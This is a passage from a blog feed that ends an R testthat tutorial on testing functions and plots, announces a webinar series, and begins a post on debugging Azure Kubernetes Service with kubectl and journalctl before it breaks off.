&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_type&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;integer&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_s3_class&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;data.frame&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="testing-a-simple-function"&gt;Testing a simple function&lt;/h3&gt;
&lt;p&gt;Let us look at a function stored in a file called &lt;code&gt;function1.R&lt;/code&gt;, with the following structure:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Function to calculate the sum of a vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_sum &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
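&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Reject non-numeric input (including NULL) with an informative error&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.numeric&lt;/span&gt;(x)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;   &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stop&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The argument of the function must be a number&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(x)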
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The tests that we can write for the above function would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Tests for get_sum function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;get_sum calculates the sum correctly&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_sum&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)), &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_sum&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)), &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;get_sum handles invalid inputs&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_error&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_sum&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;The argument of the function must be a number&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Each test case starts with a call to &lt;code&gt;test_that()&lt;/code&gt;, which takes a short description of the behaviour being tested
followed by a block of code containing the expectations.&lt;/p&gt;
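&lt;p&gt;The second argument of &lt;code&gt;expect_error()&lt;/code&gt; is treated as a regular expression, so a test does not have to repeat the whole message. The sketch below illustrates this with &lt;code&gt;parse_age()&lt;/code&gt;, a hypothetical helper invented purely for this example; only the &lt;code&gt;testthat&lt;/code&gt; calls come from the package itself.&lt;/p&gt;

```r
library(testthat)

# Hypothetical helper, used only for this illustration
parse_age = function(x) {
  if (!is.numeric(x)) {
    stop("Age must be numeric (got ", class(x)[1], ")")
  }
  x
}

test_that("parse_age validates its input", {
  # The pattern is a regular expression, so a partial match is enough
  expect_error(parse_age("ten"), "must be numeric")
  # fixed = TRUE matches the text literally instead of as a regular expression
  expect_error(parse_age("ten"), "(got character)", fixed = TRUE)
  # Valid input is returned unchanged
  expect_equal(parse_age(10), 10)
})
```

&lt;p&gt;Matching on a short, stable fragment of the message keeps the test from breaking when the wording around it is adjusted.&lt;/p&gt;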
&lt;h3 id="testing-plots"&gt;Testing Plots&lt;/h3&gt;
&lt;p&gt;Here we show how to test a &lt;code&gt;ggplot2&lt;/code&gt; plot and a base R plot.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ggplot2&lt;/code&gt; plots are easier to test because they return structured objects with accessible components:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ggplot2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;p &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(mtcars, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpg, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; hp)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot structure is correct&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_s3_class&lt;/span&gt;(p, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(rlang&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_name&lt;/span&gt;(p&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mapping&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x), &lt;span style="color:#a5d6ff"&gt;&amp;#34;mpg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note: this example may need to change in the future. {ggplot2} has been rewritten to use S7 classes internally, so the class check
may eventually require &lt;code&gt;expect_s7_class()&lt;/code&gt; instead.&lt;/p&gt;
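&lt;p&gt;The same approach extends to other components of the plot object. The sketch below checks the layer, the y mapping and the data. It assumes that &lt;code&gt;p$layers&lt;/code&gt; and &lt;code&gt;p$data&lt;/code&gt; are accessible in your installed version of {ggplot2} and that {rlang} is installed, so treat it as a starting point rather than a guaranteed recipe.&lt;/p&gt;

```r
library(testthat)
library(ggplot2)

p = ggplot(mtcars, aes(x = mpg, y = hp)) + geom_point()

test_that("ggplot uses the expected layer, mapping and data", {
  # Exactly one layer was added to the plot
  expect_length(p$layers, 1)
  # That layer draws points
  expect_true(inherits(p$layers[[1]]$geom, "GeomPoint"))
  # The y aesthetic is mapped to the hp column
  expect_equal(rlang::as_name(p$mapping$y), "hp")
  # The plot carries the full data set
  expect_equal(nrow(p$data), nrow(mtcars))
})
```

&lt;p&gt;Checks like these target the parts of the plot that matter to you, without comparing rendered images.&lt;/p&gt;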
&lt;p&gt;Base R plots are harder to test because they draw straight to the graphics device without returning a testable object.
The &lt;code&gt;{vdiffr}&lt;/code&gt; package helps here through its &lt;code&gt;expect_doppelganger()&lt;/code&gt; function (which also works for ggplot objects).
It performs snapshot testing for plots: on the first test run an image is saved,
and future runs are compared against it.&lt;/p&gt;
&lt;p&gt;Assume the following code is used to make a plot:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(vdiffr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Function that creates base R plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;create_base_scatter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(data) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mpg, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;hp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;MPG vs Horsepower&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xlab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Miles per Gallon&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ylab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Horsepower&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;16&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;abline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(hp &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; mpg, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data), col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And the testing code for the above function would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;base R scatter plot visual output is correct&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_doppelganger&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;base_scatter_plot&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_base_scatter&lt;/span&gt;(mtcars)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;expect_doppelganger()&lt;/code&gt; works by saving an SVG of the plot in a sub-directory of the tests directory. On
future runs of the tests a new image is generated and compared against the original: if they match the test passes, and
if they differ the test fails. A few things can cause doppelganger tests to fail unexpectedly, such as
randomness in the plot or time / date based variables, so keep these in mind when writing your tests.&lt;/p&gt;
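&lt;p&gt;One way to deal with randomness is to fix the seed before the plot is drawn. The sketch below assumes a hypothetical &lt;code&gt;create_random_scatter()&lt;/code&gt; function and is meant to live in a test file under &lt;code&gt;tests/testthat/&lt;/code&gt;, since snapshots are only recorded and compared during a proper test run.&lt;/p&gt;

```r
library(testthat)
library(vdiffr)

# Hypothetical plotting function whose data are simulated at random
create_random_scatter = function(n = 50) {
  x = rnorm(n)
  y = rnorm(n)
  plot(x, y, main = "Random scatter")
}

test_that("random scatter plot is stable across runs", {
  expect_doppelganger("random_scatter_plot", function() {
    # Fixing the seed makes the simulated points identical on every run
    set.seed(123)
    create_random_scatter()
  })
})
```

&lt;p&gt;Passing a function to &lt;code&gt;expect_doppelganger()&lt;/code&gt; keeps the seed and the drawing code together, so the saved snapshot and later runs see the same points.&lt;/p&gt;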
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;testthat&lt;/code&gt; package provides a robust and intuitive framework for ensuring code quality in R packages.
From basic equality checks to plot validation, these testing strategies help catch bugs early and maintain
reliable code as your package evolves. Whether you&amp;rsquo;re testing simple mathematical functions or complex data
visualisations, incorporating comprehensive unit tests into your development workflow is essential for
building trustworthy R packages. As demonstrated through the examples in this blog,
&lt;code&gt;testthat&lt;/code&gt; makes it straightforward to implement testing practices that will benefit both you and
your package users in the long run. If you would like some further reading on {testthat}, then check out
&lt;a href="https://testthat.r-lib.org/" rel="external"&gt;the website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-testthat/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Boost Your Career with Jumping Rivers Free Monthly Webinars – Next Session on 18th September</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/</link><pubDate>Mon, 15 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Our free monthly webinar series is back, and the first session on 21 August – “Reports that Write Themselves: Automated Reporting with Quarto” – was a fantastic success! It was wonderful to see the Jumping Rivers community grow, with so many data professionals joining, engaging, and sharing ideas.&lt;/p&gt;
&lt;p&gt;Next Webinar:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;18 September, 13:05 BST&lt;/strong&gt; – &lt;em&gt;Building Scalable Shiny Apps with Asynchronous Programming&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="full-webinar-schedule"&gt;Full Webinar Schedule:&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Date &amp;amp; Time (BST)&lt;/th&gt;
&lt;th style="text-align: left"&gt;Topic&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;18 September&lt;/td&gt;
&lt;td style="text-align: left"&gt;Building Scalable Shiny Apps with Asynchronous Programming&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;23 October&lt;/td&gt;
&lt;td style="text-align: left"&gt;Understanding Posit: Ecosystem and Enterprise Use Cases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;20 November&lt;/td&gt;
&lt;td style="text-align: left"&gt;Machine Learning with Python&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;11 December&lt;/td&gt;
&lt;td style="text-align: left"&gt;Accessible Shiny: Designing for All Users&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Note: All webinars take place on the second last Thursday of each month at 13:05 UK time.&lt;/p&gt;
&lt;h2 id="why-attend"&gt;Why Attend:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Gain practical, hands-on skills in R, Python, Shiny, and Posit.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Connect with fellow data professionals and expand your network.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Exclusive discounts: Gain 30% off the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production Conference (8–9 October 2025)&lt;/a&gt; and 30% off any of our public &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;online courses.&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Don’t miss out - &lt;strong&gt;register now&lt;/strong&gt; &lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;at this link&lt;/a&gt; and join us for the next session on 18 September!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Beyond the AKS Basics: Practical Tips for Your Kubernetes Journey</title><link>https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/</link><pubDate>Thu, 11 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/beyond-azure-kubernetes-service-basics/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="beyond-the-aks-basics-practical-tips-for-your-kubernetes-journey"&gt;Beyond the AKS Basics: Practical Tips for Your Kubernetes Journey&lt;/h2&gt;
&lt;p&gt;I recently completed Microsoft&amp;rsquo;s Kubernetes on Azure course
(&lt;a href="https://web.archive.org/web/20230815194156/https://azurecomcdn.azureedge.net/cvt-654ff0c11572f0043b19dd8da7fed50d177ba3060e149008310c11d8b38e15c1/mediahandler/files/resourcefiles/kubernetes-learning-path/Kubernetes%20Learning%20Path_Version%202.0.pdf/" rel="external"&gt;here is an archived version&lt;/a&gt;) and while it provided a solid
foundation, I wanted to share some practical insights and debugging
techniques that weren&amp;rsquo;t covered. This post dives into real-world scenarios with
Azure Kubernetes Service (AKS), offering tips for debugging containers and nodes,
tackling tricky issues like Posit Workbench session failures, and leveraging tools
like Packer. Plus, we&amp;rsquo;ll show you an example of how we debugged an initially
perplexing and frustrating development issue using useful commands.&lt;/p&gt;
&lt;p&gt;Following this course, I deployed a large Azure-hosted Posit Workbench deployment.
This involved VMs coordinating Kubernetes jobs for user development environments
(like RStudio), behind a reverse proxy.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-beyond-kubernetes-basics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="azure-free-trial-a-great-starting-point"&gt;Azure Free Trial: A Great Starting Point&lt;/h3&gt;
&lt;p&gt;First things first, if you&amp;rsquo;re new to Azure, don&amp;rsquo;t forget to take advantage of
the various free trials on offer. One-month and twelve-month free trials are sometimes available.
It&amp;rsquo;s an excellent way to get hands-on experience with AKS. See the &lt;a href="https://azure.microsoft.com/free/" rel="external"&gt;Azure free account page&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="level-up-your-debugging-skills"&gt;Level Up Your Debugging Skills&lt;/h3&gt;
&lt;h4 id="peeking-inside-containers"&gt;Peeking Inside Containers&lt;/h4&gt;
&lt;p&gt;Ever had a Kubernetes session refuse to start and wondered what&amp;rsquo;s
going on under the hood? A super useful command is:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;kubectl run -it --image &amp;lt;your_image&amp;gt; &amp;lt;your_container_name&amp;gt; -- /bin/bash&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This lets you spin up a temporary container based on your image and get a shell inside.
For example, when troubleshooting why some Kubernetes jobs for Posit Workbench weren’t starting,
this command came in handy:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;kubectl run -it --image ${AZURE_CONTAINER_REPOSITORY_NAME}.azurecr.io/${IMAGE_NAME} testme -- /bin/bash&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;In the above example, we’re using custom-built container images that we pushed to
Azure Container Registry. They are based on &lt;a href="https://hub.docker.com/r/rstudio/workbench-session" rel="external"&gt;ones published by Posit&lt;/a&gt;, and we use Packer to
build in extra customizations. Keep reading for more on Packer!&lt;/p&gt;
&lt;h4 id="diving-into-nodes"&gt;Diving into Nodes&lt;/h4&gt;
&lt;p&gt;Surprisingly, even with a managed service like AKS, you can debug the underlying nodes!&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;kubectl debug&lt;/code&gt; command lets you use a shell on the node itself. This proved invaluable when I needed to check the software version in use for
implementing an NFS share:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;kubectl debug node/&amp;lt;your_node_name&amp;gt; -it --image=ubuntu&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Learn more about this powerful technique &lt;a href="https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/" rel="external"&gt;in the Kubernetes documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="logs"&gt;Logs&lt;/h4&gt;
&lt;p&gt;Kubernetes logs are essential, but don&amp;rsquo;t forget the logs of the other components
in your system that sit outside Kubernetes. Many “always-on” Linux-based
applications run as systemd services, which are managed with &lt;code&gt;systemctl&lt;/code&gt; and write their logs to the journal. &lt;code&gt;journalctl&lt;/code&gt; lets you view those logs
filtered by service unit (your application), time range, and specific keywords.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo journalctl -u $SERVICE_UNIT_NAME --since &amp;quot;$TIME_RANGE&amp;quot; -g &amp;quot;$SEARCH_TERM&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;For example, when a certain Posit Workbench session (corresponding to a Kubernetes job)
was having issues earlier that day, I could quickly find relevant events on the application&amp;rsquo;s
virtual machine using this Linux command:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo journalctl -u rstudio-launcher --since today -g $SESSION_ID&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This can often provide valuable context that complements your Kubernetes logs.&lt;/p&gt;
&lt;h3 id="the-unexpected-culprit-looking-beyond-kubernetes"&gt;The Unexpected Culprit: Looking Beyond Kubernetes&lt;/h3&gt;
&lt;p&gt;Here&amp;rsquo;s a crucial lesson I learned the hard way. Sometimes, issues aren&amp;rsquo;t
within your Kubernetes cluster at all. We had a setup with a reverse proxy
sitting in front of applications on virtual machines with a Kubernetes backend.
We anticipated users might experience some initial delay when launching jobs due
to system resources. However, we were caught off guard when users started reporting
504 Gateway Timeout errors after exactly two minutes.&lt;/p&gt;
&lt;p&gt;Our initial instinct was to deep-dive into the Kubernetes configurations.
But after some head-scratching, our client pointed out the consistent
two-minute interval. This was the key! It forced us to broaden our investigation
to all components in the request path, even those outside the Kubernetes cluster.&lt;/p&gt;
&lt;p&gt;Our troubleshooting process involved meticulously listing every component
from the Kubernetes node all the way to the user&amp;rsquo;s browser. We then started checking
timeout settings on each. Guess what? The reverse proxy (more specifically,
an Azure Application Gateway), sitting innocently in front of our VMs and the rest of
our system, had a default two-minute connection timeout. If allocating a job to a node
took longer than that, the proxy would prematurely close the connection, resulting in the dreaded 504 error.&lt;/p&gt;
&lt;p&gt;This experience underscored the importance of considering the entire
system architecture when debugging. Don&amp;rsquo;t just focus on Kubernetes – think about
load balancers, proxies, firewalls, and any other piece of infrastructure that might
be interacting with your cluster. We were lucky the problematic component was one of the first we checked!&lt;/p&gt;
&lt;h3 id="automating-image-creation-with-packer"&gt;Automating Image Creation with Packer&lt;/h3&gt;
